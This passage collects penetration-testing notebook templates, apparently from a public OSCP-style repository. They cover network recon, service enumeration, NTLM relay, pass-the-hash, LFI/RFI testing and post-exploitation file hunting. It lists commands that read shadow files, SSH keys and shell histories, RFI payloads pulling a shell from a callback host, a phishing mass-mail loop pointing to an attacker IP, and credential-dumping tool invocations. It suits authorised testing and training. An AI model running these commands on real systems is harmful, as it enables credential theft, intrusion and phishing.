cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
```

--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/General Notes Linux.md:
--------------------------------------------------------------------------------
## Finding Sensitive files on Linux:

```
locate password | more
/boot/grub/i386-pc/password.mod
/etc/pam.d/common-password
/etc/pam.d/gdm-password
/etc/pam.d/gdm-password.original
/lib/live/config/0031-root-password
```
- cat /etc/profile
- cat /etc/passwd
- cat /etc/group
- cat /etc/shadow
- cat /etc/gshadow
- cat /var/apache2/config.inc
- cat /var/lib/mysql/mysql/user.MYD
- cat /root/anaconda-ks.cfg
- cat ~/.bash_history
- cat ~/.bash_profile
- cat ~/.bash_login
- cat ~/.nano_history
- cat ~/.atftp_history
- cat ~/.mysql_history
- cat ~/.php_history
- ls -alh /var/mail/

Sensitive Files for SSH:

- find / -name authorized_keys 2> /dev/null
- find / -name id_rsa 2> /dev/null

Log Files that could help:

```
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat
```
/var/log/apache2/access.log 44 | cat /var/log/apache2/error_log 45 | cat /var/log/apache2/error.log 46 | cat /var/log/apache/access_log 47 | cat /var/log/apache/access.log 48 | cat /var/log/auth.log 49 | cat /var/log/chttp.log 50 | cat /var/log/cups/error_log 51 | cat /var/log/dpkg.log 52 | cat /var/log/faillog 53 | cat /var/log/httpd/access_log 54 | cat /var/log/httpd/access.log 55 | cat /var/log/httpd/error_log 56 | cat /var/log/httpd/error.log 57 | cat /var/log/lastlog 58 | cat /var/log/lighttpd/access.log 59 | cat /var/log/lighttpd/error.log 60 | cat /var/log/lighttpd/lighttpd.access.log 61 | cat /var/log/lighttpd/lighttpd.error.log 62 | cat /var/log/messages 63 | cat /var/log/secure 64 | cat /var/log/syslog 65 | cat /var/log/wtmp 66 | cat /var/log/xferlog 67 | cat /var/log/yum.log 68 | cat /var/run/utmp 69 | cat /var/webmin/miniserv.log 70 | cat /var/www/logs/access_log 71 | cat /var/www/logs/access.log 72 | ls -alh /var/lib/dhcp3/ 73 | ls -alh /var/log/postgresql/ 74 | ls -alh /var/log/proftpd/ 75 | ls -alh /var/log/samba/ 76 | 77 | Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp 78 | ``` -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/03. 
Email Services/Enumerating Email Services.md: -------------------------------------------------------------------------------- 1 | # SMTP Ports: 2 | 3 | 25, 465, 587 4 | 5 | ## Manual Connection 6 | ``` 7 | $ nc -nv x.x.x.x 25 8 | 9 | ``` 10 | 11 | # SMTP Enumeration Tools 12 | 13 | ## Nmap Enumeration 14 | ``` 15 | $ ls -lh /usr/share/nmap/scripts/ | grep smtp 16 | -rw-r--r-- 1 root root 4309 Oct 12 09:29 smtp-brute.nse 17 | -rw-r--r-- 1 root root 4769 Oct 12 09:29 smtp-commands.nse 18 | -rw-r--r-- 1 root root 12006 Oct 12 09:29 smtp-enum-users.nse 19 | -rw-r--r-- 1 root root 5873 Oct 12 09:29 smtp-ntlm-info.nse 20 | -rw-r--r-- 1 root root 10148 Oct 12 09:29 smtp-open-relay.nse 21 | -rw-r--r-- 1 root root 716 Oct 12 09:29 smtp-strangeport.nse 22 | -rw-r--r-- 1 root root 14781 Oct 12 09:29 smtp-vuln-cve2010-4344.nse 23 | -rw-r--r-- 1 root root 7719 Oct 12 09:29 smtp-vuln-cve2011-1720.nse 24 | -rw-r--r-- 1 root root 7603 Oct 12 09:29 smtp-vuln-cve2011-1764.nse 25 | $ nmap x.x.x.x -p 25 -sV --script=exampleScript1.nse,exampleScript2.nse 26 | ``` 27 | 28 | ## Metasploit: 29 | 30 | ``` 31 | msf > use auxiliary/scanner/smtp/smtp_enum 32 | msf auxiliary(smtp_enum) set RHOSTS 33 | msf auxiliary(smtp_enum) > set rport 25 34 | msf auxiliary(smtp_enum) set USER_FILE
35 | msf auxiliary(smtp_enum) run 36 | ``` 37 | 38 | ## smtp-user-enum 39 | - Install (Kali Linux): 40 | ``` 41 | sudo apt install smtp-user-enum 42 | ``` 43 | 44 | ``` 45 | $ smtp-user-enum -M VRFY -U users.txt -t 172.21.0.0 46 | $ smtp-user-enum -M EXPN -u admin1 -t 172.21.0.0 47 | $ smtp-user-enum -M RCPT -U users.txt -T server-ips.txt 48 | $ smtp-user-enum -M EXPN -D example.com -U users.txt -t 172.21.0.0 49 | ``` 50 | 51 | ## Mass email 52 | 53 | If you've collected emails from the target domain, you can use something like the following to send out super simple phishing emails. (Saw this on a HTB machine, keep expectations of success low in the real world) 54 | ``` 55 | $ while read mail; do swaks –to $mail –from IT@targetdomain.com –header "Subject: Credentials / Errors" –body "goto http://attackerIP/" –server x.x.x.x; done < mails.txt 56 | ``` 57 | 58 | # POP3 Enumeration 59 | 60 | ## Nmap Enumeration 61 | 62 | ``` 63 | $ ls -lh /usr/share/nmap/scripts/ | grep pop 64 | -rw-r--r-- 1 root root 3953 Oct 12 09:29 pop3-brute.nse 65 | -rw-r--r-- 1 root root 1397 Oct 12 09:29 pop3-capabilities.nse 66 | -rw-r--r-- 1 root root 4941 Oct 12 09:29 pop3-ntlm-info.nse 67 | $ nmap x.x.x.x -p 110 -sV --script=exampleScript1.nse,exampleScript2.nse 68 | ``` -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/Enumerating Web Services.md: -------------------------------------------------------------------------------- 1 | 2 | # Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE! 
3 | 4 | ## Step 2: 5 | 6 | ## Common Wordlists to use for Web App Scanning: 7 | 8 | Common Wordlists to use for Web Directory Scanning: 9 | - /usr/share/wordlists/dirb/common.txt 10 | - /usr/share/wordlists/dirbuster/*.txt 11 | - /usr/share/wordlists/wfuzz/general/*.txt 12 | - /usr/share/seclists/Discovery/Web-Content/ 13 | - Assetnote Wordlists: https://wordlists.assetnote.io/ 14 | - Jhaddix Content Discovery: https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10 15 | 16 | Common Wordlists to use for User Enumeration Scanning: 17 | - /usr/share/seclists/Usernames 18 | - /usr/share/wordlists/dirbuster/apache-user-enum-2.0 19 | 20 | ## Web App Scanners 21 | 22 | 23 | Wpscan(WordPress Scannner): 24 | 25 | - wpscan --url 26 | - wpscan --url --enumerate ap at (All Plugins, All Themes) 27 | - wpscan --url --enumerate u (Usernames) 28 | - wpscan --url --enumerate v 29 | 30 | 31 | 32 | Other Tools: 33 | - Burp Suite 34 | - OWASP Zap 35 | - Cadaver 36 | - SQLMap 37 | - Joomscan 38 | - Feroxbuster 39 | 40 | ## Testing for LFI: 41 | 42 | https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf 43 | 44 | Examples: 45 | 46 | http://example.com/index.php?page=etc/passwd 47 | http://example.com/index.php?page=etc/passwd%00 48 | http://example.com/index.php?page=../../etc/passwd 49 | http://example.com/index.php?page=%252e%252e%252f 50 | http://example.com/index.php?page=....//....//etc/passwd 51 | 52 | Interesting Files: 53 | 54 | Linux: 55 | 56 | ``` 57 | /etc/passwd 58 | /etc/shadow 59 | /etc/issue 60 | /etc/group 61 | /etc/hostname 62 | /etc/ssh/ssh_config 63 | /etc/ssh/sshd_config 64 | /root/.ssh/id_rsa 65 | /root/.ssh/authorized_keys 66 | /home/user/.ssh/authorized_keys 67 | /home/user/.ssh/id_rsa 68 | ``` 69 | 70 | Windows: 71 | ``` 72 | /boot.ini 73 | /autoexec.bat 74 | /windows/system32/drivers/etc/hosts 75 | /windows/repair/SAM 76 | ``` 77 | 78 | 79 | ## Testing for RFI: 80 | 81 | 
http://example.com/index.php?page=http://callback.com/shell.txt 82 | http://example.com/index.php?page=http://callback.com/shell.txt%00 83 | http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt 84 | 85 | ## Resources 86 | 87 | - Turning LFI to RFI: 88 | https://l.avala.mp/?p=241 89 | Backup: https://web.archive.org/web/20210612222732/https://l.avala.mp/?p=241 -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/General Notes.md: -------------------------------------------------------------------------------- 1 | # "PCAP IT OR IT DIDNT HAPPEN...its up to you if you need to" 2 | 3 | 4 | ## tcpdump: 5 | 6 | - tcpdump -i eth0 7 | - tcpdump -c -i eth0 8 | - tcpdump -A -i eth0 9 | - tcpdump -w 0001.pcap -i eth0 10 | - tcpdump -r 0001.pcap 11 | - tcpdump -n -i eth0 12 | - tcpdump -i eth0 port 22 13 | - tcpdump -i eth0 -src 172.21.10.X 14 | - tcpdump -i eth0 -dst 172.21.10.X 15 | 16 | Other tools: 17 | 18 | Tshark (Command Line Wireshark) 19 | Wireshark 20 | 21 | 22 | ## Network Scanning 23 | 24 | NetDiscover (ARP Scanning): 25 | - netdiscover -i eth0 26 | - netdiscover -r 172.21.10.0/24 27 | 28 | Nmap: 29 | 30 | - nmap -sn 172.21.10.0/24 31 | - nmap -sn 172.21.10.1-253 32 | - nmap -sn 172.21.10.* 33 | 34 | Nbtscan: 35 | - nbtscan -r 172.21.1.0/24 36 | 37 | Linux Ping Sweep (Bash) 38 | 39 | - for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done 40 | 41 | Windows Ping Sweep (Run on Windows System) 42 | 43 | - for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 192.168.1.%i is up. 
44 | 45 | 46 | 47 | ## Host Scanning 48 | 49 | Nmap: 50 | 51 | - nmap -sC -sV 172.21.0.0 52 | - nmap -sV -Pn 172.21.0.0 53 | - nmap -T4 -sC -sV 172.21.0.0 54 | - nmap -A 172.21.0.0 55 | 56 | IPv6 Scan: 57 | 58 | Nmap Scripts: 59 | 60 | Location: /usr/share/nmap/scripts/ 61 | 62 | - nmap --scripts vuln,safe,discovery -oN results.txt target-ip 63 | 64 | Scans through Socks proxy: 65 | 66 | - nmap --proxies socks4://proxy-ip:8080 target-ip 67 | 68 | DNSRecon: 69 | 70 | - dnsrecon -d www.example.com -a 71 | - dnsrecon -d www.example.com -t axfr 72 | - dnsrecon -d 73 | - dnsrecon -d www.example.com -D -t brt 74 | 75 | Dig: 76 | 77 | - dig www.example.com + short 78 | - dig www.example.com MX 79 | - dig www.example.com NS 80 | - dig www.example.com> SOA 81 | - dig www.example.com ANY +noall +answer 82 | - dig -x www.example.com 83 | - dig -4 www.example.com (For IPv4) 84 | - dig -6 www.example.com (For IPv6) 85 | - dig www.example.com mx +noall +answer example.com ns +noall +answer 86 | - dig -t AXFR www.example.com 87 | 88 | Sublis3r: 89 | 90 | - Sublist3r -d www.example.com 91 | - Sublist3r -v -d www.example.com -p 80,443 92 | 93 | OWASP AMASS: 94 | 95 | - amass enum -d www.example.com 96 | - amass intel -whois -d www.example.com 97 | - amass intel -active 172.21.0.0-64 -p 80,443,8080,8443 98 | - amass intel -ipv4 -whois -d www.example.com 99 | - amass intel -ipv6 -whois -d www.example.com 100 | 101 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/05. 
Network Shares (SMB, SAMBA, NFS)/SMB Enumeration.md: -------------------------------------------------------------------------------- 1 | # Nmap Enumeration: 2 | ``` 3 | /usr/share/nmap/scripts/smb-brute.nse 4 | /usr/share/nmap/scripts/smb-enum-domains.nse 5 | /usr/share/nmap/scripts/smb-enum-groups.nse 6 | /usr/share/nmap/scripts/smb-enum-processes.nse 7 | /usr/share/nmap/scripts/smb-enum-services.nse 8 | /usr/share/nmap/scripts/smb-enum-sessions.nse 9 | /usr/share/nmap/scripts/smb-enum-shares.nse 10 | /usr/share/nmap/scripts/smb-enum-users.nse 11 | /usr/share/nmap/scripts/smb-flood.nse 12 | /usr/share/nmap/scripts/smb-ls.nse 13 | /usr/share/nmap/scripts/smb-mbenum.nse 14 | /usr/share/nmap/scripts/smb-os-discovery.nse 15 | /usr/share/nmap/scripts/smb-print-text.nse 16 | /usr/share/nmap/scripts/smb-protocols.nse 17 | /usr/share/nmap/scripts/smb-psexec.nse 18 | /usr/share/nmap/scripts/smb-security-mode.nse 19 | /usr/share/nmap/scripts/smb-server-stats.nse 20 | /usr/share/nmap/scripts/smb-system-info.nse 21 | ``` 22 | 23 | - nmap --script smb-* -p 139,445, 172.21.0.0 24 | - nmap --script smb-enum-* -p 139,445, 172.21.0.0 25 | 26 | 27 | 28 | # Enum4linux: 29 | 30 | - Enum4linux -a 172.21.0.0 31 | - Enum4linux -U 172.21.0.0 32 | - Enum4linux -r 172.21.0.0 33 | - Enum4linux -S 172.21.0.0 34 | 35 | # Enum4linux-Ng 36 | https://github.com/cddmp/enum4linux-ng 37 | - Enum4linux 172.21.0.0 -A 38 | - Enum4linux-ng 172.21.0.0 -A -C 39 | - Enum4linux 172.21.0.0 -S 40 | - Enum4linux 172.21.0.0 -K ticket.kirbi -A 41 | 42 | # SMBmap: 43 | 44 | - smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password] 45 | - smbmap -H 172.21.0.0 -d [domain] -u "" -p "" 46 | 47 | # SMBClient: 48 | 49 | - smbclient -L 172.21.0.0 50 | - smbclient //172.21.0.0/tmp 51 | 52 | Recursively list a directory: 53 | ``` 54 | $ smbclient \\\\x.x.x.x\\Folder 55 | smb: \> recurse on 56 | smb: \> ls 57 | ``` 58 | 59 | # Impacket: 60 | 61 | ## Smbclient: 62 | - /usr/share/doc/python3-impacket/examples/smbclient.py 
username@172.21.0.0 63 | - impacket-smbclient username@172.21.0.0 64 | ## Samdump: 65 | - Impackert-sam SMB 172.21.0.0 66 | 67 | # RPCclient: 68 | 69 | - rpcclient -U "" -N 172.21.0.0 enumdomusers 70 | 71 | # CrackMapExec: 72 | 73 | - crackmapexec smb -L 74 | - crackmapexec 172.21.0.0 -u Administrator -H [hash] --local-auth 75 | - crackmapexec 172.21.0.0 -u Administrator -H [hash] --share 76 | - crackmapexec smb --gen-relay-list smb-targets.txt 172.21.0.0/24 77 | - crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz 78 | - crackmapexec smb x.x.x.x --pass-pol -u '' -p '' 79 | 80 | # Polenum: 81 | - polenum -u '' -p '' -d x.x.x.x 82 | 83 | 84 | 85 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket NtlmRelayX.md: -------------------------------------------------------------------------------- 1 | # Utilizing Sock sessions with Responder and NtlmRelayX 2 | 3 | ``` 4 | ntlmrelayx> socks 5 | Protocol Target Username Port 6 | -------- -------------- ------------------------ ---- 7 | SMB 172.21.48.38 SPAWN/MSIMMONS 445 8 | MSSQL 172.21.48.230 FAERIE/ADMINISTRATOR 1433 9 | MSSQL 172.21.48.230 FAERIE/ROOT 1433 10 | SMB 172.21.48.230 FAERIE/ADMINISTRATOR 445 11 | SMB 172.21.48.230 FAERIE/ALSIMMONS 445 12 | SMTP 172.21.48.225 FAERIEEXCHANGE/SBURKE 25 13 | SMTP 172.21.48.225 FAERIEEXCHANGE/TWILLIAMS 25 14 | IMAP 172.21.48.225 FAERIEEXCHANGE/TMCFARLANE 143 15 | ``` 16 | 17 | # Testing Sock Access from NtlmRelayX: 18 | ## SMB: 19 | Using SMBExec: 20 | - proxychains4 impacket-smbexec SPAWN/MSIMMONS@172.21.48.38 21 | - proxychains4 smbexec.py SPAWN/MSIMMONS@172.21.48.38 22 | Using Smbclient 23 | - proxychains4 impacket-smbclient SPAWN/MSIMMONS@172.21.48.38 24 | - proxychains4 smbclient.py SPAWN/MSIMMONS@172.21.48.38 25 | 26 | ## Secrets Dump 27 | - proxychains4 impacket-secretsdump SPAWN/MSIMMONS@172.21.48.38 28 | - 
proxychains4 secretsdump.py SPAWN/MSIMMONS@172.21.48.38 29 | 30 | ## Pass The Hash: 31 | If you obtain hashes from ntlmrelayx you can use the ntlm hash to gain access to a target using the following scripts or tools: 32 | 33 | Impacket Wmiexec: 34 | - impacket-wmiexec -hashes ' INSERT HASH HERE' administrator@172.21.48.230 35 | - wmiexec.py -hashes ' INSERT HASH HERE' administrator@172.21.48.230 36 | 37 | Evil-WinRM: 38 | - evil-winrm -u Administrator -H 'INSERT HASH HERE' -i 172.21.48.230 39 | 40 | XfreeRDP: 41 | - xfreerdp /u:Administrator /pth:'INSERT HASH HERE' /v:172.21.48.230 42 | 43 | # Other NtlmRelayX Commands: 44 | ## In Kali: 45 | ### SMB 46 | - impacket-ntlmrelayx -socks -smb2support -tf smb-targets.txt -c 47 | - impacket-ntlmrelayx -socks -smb2support -tf smb-targets.txt -c whoami 48 | ### Ldap 49 | - impacket-ntlmrelayx -t ldap://dc.domain.local --shadow-credentials --shadow-target target\$ 50 | 51 | ## Python Impacket: 52 | ### SMB 53 | - ntlmrelayx.py -socks -smb2support -tf smb-targets.txt -c 54 | - ntlmrelayx.py -tf smb-targets.txt -c whoami 55 | ### LDAP 56 | - ntlmrelayx.py -t ldap://dc.domain.local --shadow-credentials --shadow-target target\$ 57 | 58 | # References: 59 | - https://www.hackingarticles.in/a-detailed-guide-on-responder-llmnr-poisoning/ 60 | - https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0 61 | - https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/ 62 | - https://www.offsec-journey.com/post/attacking-ms-sql-servers -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/8. 
Other Services/LDAP Enumeration (Port 389).md: -------------------------------------------------------------------------------- 1 | # LDAP Enumeration Tools 2 | 3 | **Note:** Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy. 4 | 5 | ### ldapsearch 6 | 7 | Simple authentication check: 8 | ``` 9 | $ ldapsearch -h -x 10 | ``` 11 | Anonymous Credential LDAP Dumping: 12 | ``` 13 | $ ldapsearch -LLL -x -H ldap:// -b ‘’ -s base ‘(objectclass=*)’ 14 | ``` 15 | Getting DN: 16 | ``` 17 | $ ldapsearch -h -x -s base namingcontexts 18 | ``` 19 | - `-s` is scope: one of base, one, sub or children (search scope) 20 | 21 | If you get DN from above command, use it in a base search (-b basedn: base dn for search) 22 | ``` 23 | $ ldapsearch -h -x -b "DC=,DC=" 24 | ``` 25 | You can also query the LDAP server: 26 | ``` 27 | $ ldapsearch -h -x -b "DC=,DC=" 28 | ``` 29 | i.e. user enumeration: 30 | ``` 31 | $ ldapsearch -h -x -b "DC=,DC=" '(objectClass=Person)' 32 | ``` 33 | This will give a lot of useful information, i.e. when password was last reset, username of the account (sAMAccountName). 34 | 35 | Filtering your query: 36 | ``` 37 | $ ldapsearch -h -x -b "DC=,DC=" '(objectClass=Person)' 38 | ``` 39 | I.e. 
to query for only account names: 40 | ``` 41 | $ ldapsearch -h -x -b "DC=,DC=" '(objectClass=Person)' sAMAccountName 42 | ``` 43 | Or use grep to get a list of account names for password spraying: 44 | ``` 45 | $ ldapsearch -h -x -b "DC=,DC=" '(objectClass=Person)' sAMAccountName | grep sAMAccountName | awk '{print $2}' > userlist.ldap 46 | ``` 47 | 48 | ### Impacket 49 | 50 | Using that username list generated from `ldapsearch`, we can use Impacket's `GetNPUsers.py` to see if we can get a user's TGT: 51 | ``` 52 | $ python3 GetNPUsers.py -dc-ip -request domain.local/ -userfile userlist.ldap -format john 53 | ``` 54 | or 55 | ``` 56 | $ GetADUsers.py -all -dc-ip 57 | ``` 58 | 59 | You can simply change the -format flag to hashcat if you want to use hashcat. 60 | 61 | Or try with no password: 62 | ``` 63 | $ python3 GetNPUsers.py -request -no-pass -dc-ip 64 | ``` 65 | 66 | Impacket `lookupsid.py`: 67 | ``` 68 | $ /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@x.x.x.x 69 | ``` 70 | 71 | ### Windapsearch 72 | 73 | Source: https://github.com/ropnop/windapsearch 74 | ``` 75 | $ python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U 76 | ``` 77 | 78 | #### References: 79 | 80 | - [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise) -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. 
Recon Notes/Discovery Scans/DNS_Hostname Discovery.md: -------------------------------------------------------------------------------- 1 | # DNS Discovery 2 | 3 | DNSRecon: 4 | 5 | - dnsrecon -d www.example.com -a 6 | - dnsrecon -d www.example.com -t axfr 7 | - dnsrecon -d 8 | - dnsrecon -d www.example.com -D -t brt 9 | 10 | Dig: 11 | 12 | - dig www.example.com + short 13 | - dig www.example.com MX 14 | - dig www.example.com NS 15 | - dig www.example.com> SOA 16 | - dig www.example.com ANY +noall +answer 17 | - dig -x www.example.com 18 | - dig -4 www.example.com (For IPv4) 19 | - dig -6 www.example.com (For IPv6) 20 | - dig www.example.com mx +noall +answer example.com ns +noall +answer 21 | - dig -t AXFR www.example.com 22 | 23 | Dnsenum Enumeration: 24 | 25 | - dnsenum --dnsserver 172.21.0.0 -enum intranet.megacorpone.xx 26 | - dnsenum --dnsserver 172.21.0.0 -enum management.megacorpone.xx 27 | - dnsenum --dnsserver 172.21.0.0 -enum www.megacorpone.xx 28 | 29 | dnsX Enumeration: 30 | - dnsx -l domains.txt -resp -a -aaaa -cname -mx -ns -soa -txt 31 | - dnsx -silent -d megacorpone.com -w /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt 32 | 33 | Using with subfinder: 34 | - subfinder -silent -d megacorpone.com | dnsx -silent 35 | - subfinder -silent -d megacorpone.com | dnsx -silent -a -resp 36 | - subfinder -silent -d megacorpone.com | dnsx -silent -a -resp-only 37 | - subfinder -silent -d megacorpone.com | dnsx -silent -cname -resp 38 | - subfinder -silent -d megacorpone.com | dnsx -silent -asn 39 | 40 | 41 | Nmap Enumeration: 42 | ``` 43 | $ ls -lh /usr/share/nmap/scripts/ | grep dns 44 | -rw-r--r-- 1 root root 1499 Oct 12 09:29 broadcast-dns-service-discovery.nse 45 | -rw-r--r-- 1 root root 5329 Oct 12 09:29 dns-blacklist.nse 46 | -rw-r--r-- 1 root root 10100 Oct 12 09:29 dns-brute.nse 47 | -rw-r--r-- 1 root root 6639 Oct 12 09:29 dns-cache-snoop.nse 48 | -rw-r--r-- 1 root root 15152 Oct 12 09:29 dns-check-zone.nse 49 | -rw-r--r-- 1 root root 14826 Oct 12 
09:29 dns-client-subnet-scan.nse 50 | -rw-r--r-- 1 root root 10168 Oct 12 09:29 dns-fuzz.nse 51 | -rw-r--r-- 1 root root 3803 Oct 12 09:29 dns-ip6-arpa-scan.nse 52 | -rw-r--r-- 1 root root 12702 Oct 12 09:29 dns-nsec3-enum.nse 53 | -rw-r--r-- 1 root root 10580 Oct 12 09:29 dns-nsec-enum.nse 54 | -rw-r--r-- 1 root root 3441 Oct 12 09:29 dns-nsid.nse 55 | -rw-r--r-- 1 root root 4364 Oct 12 09:29 dns-random-srcport.nse 56 | -rw-r--r-- 1 root root 4363 Oct 12 09:29 dns-random-txid.nse 57 | -rw-r--r-- 1 root root 1456 Oct 12 09:29 dns-recursion.nse 58 | -rw-r--r-- 1 root root 2195 Oct 12 09:29 dns-service-discovery.nse 59 | -rw-r--r-- 1 root root 5679 Oct 12 09:29 dns-srv-enum.nse 60 | -rw-r--r-- 1 root root 5765 Oct 12 09:29 dns-update.nse 61 | -rw-r--r-- 1 root root 2123 Oct 12 09:29 dns-zeustracker.nse 62 | -rw-r--r-- 1 root root 26574 Oct 12 09:29 dns-zone-transfer.nse 63 | -rw-r--r-- 1 root root 3910 Oct 12 09:29 fcrdns.nse 64 | ``` 65 | -nmap x.x.x.x -v -p 53 --script=exampleScript1.nse,exampleScript2.nse 66 | 67 | 68 | 69 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/1. 
Recon/General Notes.md: -------------------------------------------------------------------------------- 1 | # "PCAP IT OR IT DIDNT HAPPEN...its up to you if you need to" 2 | 3 | 4 | ## tcpdump: 5 | 6 | - tcpdump -i eth0 7 | - tcpdump -c -i eth0 8 | - tcpdump -A -i eth0 9 | - tcpdump -w 0001.pcap -i eth0 10 | - tcpdump -r 0001.pcap 11 | - tcpdump -n -i eth0 12 | - tcpdump -i eth0 port 22 13 | - tcpdump -i eth0 -src 172.21.10.X 14 | - tcpdump -i eth0 -dst 172.21.10.X 15 | 16 | Other tools: 17 | 18 | Tshark (Command Line Wireshark) 19 | Wireshark 20 | 21 | 22 | ## Network Scanning 23 | 24 | NetDiscover (ARP Scanning): 25 | - netdiscover -i eth0 26 | - netdiscover -r 172.21.10.0/24 27 | 28 | Nmap: 29 | 30 | - nmap -sn 172.21.10.0/24 31 | - nmap -sn 172.21.10.1-253 32 | - nmap -sn 172.21.10.* 33 | 34 | Nbtscan: 35 | - nbtscan -r 172.21.1.0/24 36 | 37 | Linux Ping Sweep (Bash) 38 | 39 | - for i in {1..254} ;do (ping -c 1 172.21.10.$i | grep "bytes from" &) ;done 40 | 41 | Windows Ping Sweep (Run on Windows System) 42 | 43 | - for /L %i in (1,1,255) do @ping -n 1 -w 200 172.21.10.%i > nul && echo 172.21.1.%i is up. 
44 | 45 | 46 | 47 | ## Host Scanning 48 | 49 | Nmap: 50 | 51 | - nmap -sC -sV 172.21.0.0 52 | - nmap -Pn -sC -sV -p- 172.21.0.0 53 | - nmap -sV -Pn 172.21.0.0 54 | - nmap -T4 -sC -sV 172.21.0.0 55 | - nmap -A 172.21.0.0 56 | 57 | Nmap Stealth: 58 | - nmap -sS -sC -sV 172.21.0.0 59 | - nmap -sS -p- 172.21.0.0 60 | 61 | 62 | UDP Scan: 63 | - nmap -sS -sU -Pn -sV 172.21.0.0 64 | - nmap -sU -A --top-ports=20 --version-all 65 | - nmap -sU -A -p 53,67,68,161,162 --version-all 66 | - unicornscan -mU -p ,161,162,137,123,138,1434,445,135,67,68,53,139,500,637,162,69 67 | 68 | 69 | IPv6 Scan: 70 | 71 | Nmap Scripts: 72 | 73 | Location: /usr/share/nmap/scripts/ 74 | 75 | - nmap --scripts vuln,safe,discovery -oN results.txt target-ip 76 | 77 | Scans through Socks proxy: 78 | 79 | - nmap --proxies socks4://proxy-ip:8080 target-ip 80 | 81 | DNSRecon: 82 | 83 | - dnsrecon -d www.example.com -a 84 | - dnsrecon -d www.example.com -t axfr 85 | - dnsrecon -d 86 | - dnsrecon -d www.example.com -D -t brt 87 | 88 | Dig: 89 | 90 | - dig www.example.com + short 91 | - dig www.example.com MX 92 | - dig www.example.com NS 93 | - dig www.example.com> SOA 94 | - dig www.example.com ANY +noall +answer 95 | - dig -x www.example.com 96 | - dig -4 www.example.com (For IPv4) 97 | - dig -6 www.example.com (For IPv6) 98 | - dig www.example.com mx +noall +answer example.com ns +noall +answer 99 | - dig -t AXFR www.example.com 100 | 101 | Sublis3r: 102 | 103 | - Sublist3r -d www.example.com 104 | - Sublist3r -v -d www.example.com -p 80,443 105 | 106 | OWASP AMASS: 107 | 108 | - amass enum -d www.example.com 109 | - amass intel -whois -d www.example.com 110 | - amass intel -active 172.21.0.0-64 -p 80,443,8080,8443 111 | - amass intel -ipv4 -whois -d www.example.com 112 | - amass intel -ipv6 -whois -d www.example.com 113 | 114 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/General 
Information.md: -------------------------------------------------------------------------------- 1 | Created by TJ Null: 2 | 3 | Twitter: https://twitter.com/TJ_Null 4 | Github: https://github.com/tjnull 5 | 6 | Contribution: 7 | 8 | If you would like to contribute to the template or provide suggestions, then you can submit an issue on the Github Repo here: 9 | - https://github.com/tjnull/TJ-JPT 10 | 11 | ## Changelog: 12 | 13 | v1.0: Original Template 14 | 15 | v2.0 The first chapter 16 | 17 | 2. Enumeration 18 | - Added an FTP Notebook to include notes for that identified service 19 | - Added more content in Active Directory 20 | - Web has a subnotebook to include any content from the changelog.txt file 21 | - Fixed the gobuster oneliners to match with the recent changes from the tool 22 | 23 | 3. Exploitation 24 | - Added some custom options for searchsploit 25 | 26 | 4. Post Exploitation 27 | - Moved the subnotebook into a subnotebook (Target #1) so the user can copy the subnotebook and add another one under post exploitation for other targets. 28 | - Created a sub notebook to include the output from automated priv esc scripts that are used. 29 | - Included tools, tips, and resources in all 